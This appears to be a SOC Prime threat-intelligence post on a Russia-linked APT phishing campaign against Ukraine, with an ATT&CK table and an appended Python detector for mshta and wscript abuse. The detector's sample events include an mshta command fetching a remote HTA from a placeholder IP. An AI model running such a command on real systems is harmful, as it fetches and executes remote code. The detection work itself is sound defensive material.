Armageddon APT Hacker Group, also known as UAC-0010, spreads phishing emails posing as the State Service for Special Communications of Ukraine

Armageddon APT alias UAC-0010 resurfaces

Armageddon APT, also known as Gamaredon or UAC-0010 and linked to Russia, has been launching a series of cyber attacks against Ukraine since the outbreak of the global cyber war. On November 8, 2022, CERT-UA published its latest alert detailing the ongoing phishing campaign by this Russian-backed cyber-espionage collective, in which the adversaries mass-distribute forged emails posing as the State Service of Special Communications of Ukraine. In this targeted campaign, Armageddon APT hackers rely on the attack vector of malicious email attachments.

Armageddon APT (UAC-0010) Cyber Attacks: Analysis of the Latest Phishing Campaign Against Ukraine

Since Russia's full-scale invasion of Ukraine, the infamous Russia-linked Armageddon APT group, also tracked as UAC-0010 or Primitive Bear, has been actively exploiting phishing attack vectors and malicious email attachments in campaigns directed against Ukraine. In May and July 2022, the collective massively distributed the GammaLoad.PS1_v2 malware, while in August 2022 the adversaries used the GammaSteel.PS1 and GammaSteel.NET malware to spread the infection on compromised systems.

In the ongoing adversary campaigns reported in the CERT-UA#5570 alert, the infection chain is triggered by phishing emails carrying a malicious attachment which, if opened, downloads an HTML file with JavaScript code. That code creates a RAR archive containing a shortcut (LNK) file on the vulnerable computer. Once opened, the LNK file downloads and executes an HTA file, which in turn runs malicious VBScript code. This ultimately leads to the deployment of various malicious strains on the targeted systems, including information-stealing malware samples.

CERT-UA researchers report that the phishing emails are sent via the @mail.gov.ua service. In addition, Armageddon APT hackers follow their usual adversary pattern of using a third-party service or Telegram to resolve the C2 server IP address.

Detecting the Latest Armageddon APT Campaign Against Ukrainian Entities

The series of Russia-linked Armageddon APT phishing campaigns repeatedly targeting Ukraine since March 2022 poses a growing threat that requires timely detection and a strong response from security professionals. SOC Prime's Detection as Code platform offers a set of curated Sigma rules to identify the related malicious activity covered in the CERT-UA#5570 alert early in the attack lifecycle. Follow the link below to access the relevant detection content tagged "CERT-UA#5570" based on the corresponding cybersecurity alert:

Sigma rules to detect malicious activity of the UAC-0010 group covered in alert CERT-UA#5570

To proactively defend against existing and emerging Armageddon APT cyber attacks tracked by cyber defenders since Russia's full-scale invasion of Ukraine, press the Explore Detections button and access the dedicated detection stack. All Sigma rules are aligned with MITRE ATT&CK® and enriched with extensive cyber threat context, including relevant CTI links, mitigations, executable binaries, and other relevant metadata. Detection rules come with translations to industry-leading SIEM, EDR, and XDR solutions.

Explore Detections

To simplify routine threat hunting and improve detection engineering capabilities, security specialists can search for IOCs related to the malicious activity of UAC-0010 adversaries covered in the CERT-UA#5570 alert. Simply paste the text containing the relevant IOCs into Uncoder CTI and get custom IOC queries ready to run in the selected environment.

IOCs for alert CERT-UA#5570 using Uncoder CTI

MITRE ATT&CK® Context

To delve into the context behind the latest cyber attacks from the Russia-linked Armageddon APT group, also known as UAC-0010, covered in the CERT-UA#5570 alert, all dedicated Sigma rules are aligned with the MITRE ATT&CK® framework, addressing the corresponding tactics and techniques:

| Tactic | Techniques | Sigma rule |
|---|---|---|
| Defense Evasion | Signed Binary Proxy Execution (T1218) | LOLBAS Wscript (via process_creation) |
| Defense Evasion | Signed Binary Proxy Execution (T1218) | LOLBAS mshta (via cmdline) |
| Execution | Command and Scripting Interpreter (T1059) | LOLBAS Wscript (via process_creation) |
| Command and Control | Protocol Tunneling (T1572) | Suspicious DNS Resolution Using Third-Party Services (via proxy) |
| Command and Control | Protocol Tunneling (T1572) | Suspicious DNS Resolution Using Third-Party Services (via dns) |
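As an added example (not part of the original SOC Prime post and not its Sigma rules), the Python sketch below reproduces the logic behind the two LOLBAS rule titles from the table over constructed Sysmon-style process-creation events: mshta.exe launched with a remote URL or an HTA in a user-writable directory, and wscript.exe spawned by mshta.exe or running a script from such a directory, matching the LNK → HTA → VBScript step of the infection chain. The event format, file names, paths and the 198.51.100.23 address are all assumptions made for this example.

```python
import re

# Constructed Sysmon-style process-creation events (key=value pairs separated by '|');
# paths, file names and the 198.51.100.23 address are made up for this example.
SAMPLE_EVENTS = [
    r"Image=C:\Windows\explorer.exe|ParentImage=C:\Windows\System32\userinit.exe|CommandLine=explorer.exe",
    r"Image=C:\Windows\System32\mshta.exe|ParentImage=C:\Windows\explorer.exe|CommandLine=mshta.exe http://198.51.100.23/example.hta",
    r"Image=C:\Windows\System32\wscript.exe|ParentImage=C:\Windows\System32\mshta.exe|CommandLine=wscript.exe //e:vbscript C:\Users\u\AppData\Local\Temp\example.vbs",
    r"Image=C:\Windows\System32\mshta.exe|ParentImage=C:\Windows\explorer.exe|CommandLine=mshta.exe C:\Program Files\Vendor\setup.hta",
    r"Image=C:\Windows\System32\wscript.exe|ParentImage=C:\Windows\explorer.exe|CommandLine=wscript.exe C:\Program Files\Vendor\maint.vbs",
]

# Remote content and user-writable script locations are the suspicious inputs for these LOLBins.
URL = re.compile(r"https?://", re.I)
USER_WRITABLE = re.compile(r"\\(?:Users\\[^\\]+\\(?:AppData|Downloads)|ProgramData|Windows\\Temp)\\", re.I)


def parse_event(line):
    """Split one 'k=v|k=v' line into a dict; split on the first '=' only, since values may contain '='."""
    return dict(part.split("=", 1) for part in line.split("|"))


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def detect(event):
    """Return the name of the matching rule (modelled on the table's titles) or None."""
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    # T1218: mshta.exe fetching a remote HTA or running one from a user-writable path
    if image == "mshta.exe" and (URL.search(cmd) or USER_WRITABLE.search(cmd)):
        return "LOLBAS mshta (via cmdline)"
    # T1059/T1218: wscript.exe spawned by mshta.exe (the HTA -> VBScript step) or running a user-writable script
    if image == "wscript.exe" and (parent == "mshta.exe" or USER_WRITABLE.search(cmd)):
        return "LOLBAS Wscript (via process_creation)"
    return None


def scan(lines):
    """Return (rule, command line) for every event that triggers a rule; benign Program Files usage is ignored."""
    hits = []
    for line in lines:
        event = parse_event(line)
        rule = detect(event)
        if rule:
            hits.append((rule, event["CommandLine"]))
    return hits
```

The two vendor-path events are kept as negative cases: signed HTA or VBScript usage from Program Files does not fire, which is the false-positive trade-off a production rule has to tune per environment.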

The post Armageddon APT Hacker Group, also known as UAC-0010, spreads phishing emails posing as the State Service for Special Communications of Ukraine appeared first on SOC Prime.
